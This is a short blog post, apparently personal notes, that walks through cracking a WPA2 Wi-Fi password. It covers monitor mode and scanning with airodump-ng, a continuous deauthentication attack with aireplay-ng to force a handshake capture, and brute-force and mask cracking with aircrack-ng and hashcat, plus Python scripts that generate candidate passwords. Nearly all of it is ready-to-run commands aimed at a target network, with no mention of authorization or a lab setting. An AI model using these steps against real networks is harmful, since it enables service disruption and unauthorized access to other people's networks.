---
title: "How to Hack Wi-Fi (Evil Hacker Edition 😈)"
url: https://bee.whoisjason.me/blogposts/cmuq60zpr0001l301h118jm2l
author: Jason
published: 2026-10-01
topics: ["networking"]
summary: "Using aircrack-ng to bruteforce WPA2"
reading_time_minutes: 1
word_count: 255
---
# How to Hack Wi-Fi (Evil Hacker Edition 😈)

> Using aircrack-ng to bruteforce WPA2

## WPA2 crack notes

### Find WLAN adapter

```
iwconfig
```

### Monitor mode

```bash
sudo airmon-ng check kill
sudo airmon-ng start wlan1
```

### Scan

```bash
sudo airodump-ng wlan1mon
```

**If target is 5GHz:** add `--band a` (airodump defaults to 2.4GHz/`bg` on many drivers)

```bash
sudo airodump-ng --band a wlan1mon
```

### Lock to target BSSID/channel

```bash
sudo airodump-ng -c <channel> -w outputfilename -d <BSSID> wlan1mon
```

5GHz channel numbers differ (36, 40, 44, 48, 149, 153... not 1–13). Use `--band a` here too if locking to a 5GHz channel.

### Deauth to force handshake

```bash
sudo aireplay-ng --deauth 0 -a <BSSID> -c <station MAC> wlan1mon
```

Wait for `WPA handshake: <BSSID>` in the airodump header, then Ctrl+C.

### Crack directly (wordlist only)

```bash
sudo aircrack-ng outputfilename-01.cap -w password.txt
```

### Convert for hashcat

```
hcxpcapngtool -o outputfilename.hc22000 outputfilename-01.cap
```

### Numeric-only pass

```
hashcat -m 22000 -a 3 -O outputfilename.hc22000 '?d?d?d?d?d?d?d?d'
```

### Full charset mask — only viable up to ~8 chars

```
hashcat -m 22000 -a 3 -1 '?l?u?d' outputfilename.hc22000 '?1?1?1?1?1?1?1?1'
```

### Known length/suffix, unknown case placement

```python
python3 -c "
import itertools
with open('test.hcmask', 'w') as f:
    for i, j in itertools.combinations(range(10), 2):
        letters = ['?u' if p in (i, j) else '?l' for p in range(10)]
        f.write(''.join(letters) + '1234!!\n')
"
hashcat -m 22000 -a 3 -O outputfilename.hc22000 test.hcmask
```

### Two-word + known suffix (best odds for human-chosen passwords)

```python
python3 << 'EOF'
from collections import defaultdict
words = set(w.strip().lower() for w in open("wordlist.txt") if w.strip().isalpha())
by_len = defaultdict(list)
for w in words:
    by_len[len(w)].append(w)
TOTAL, SUFFIX = 10, "1234!!"
with open("candidates.txt", "w") as f:
    for la in range(2, TOTAL-1):
        lb = TOTAL - la
        for a in by_len.get(la, []):
            for b in by_len.get(lb, []):
                f.write(a.capitalize() + b.capitalize() + SUFFIX + "\n")
EOF
hashcat -m 22000 -a 0 -O outputfilename.hc22000 candidates.txt
```
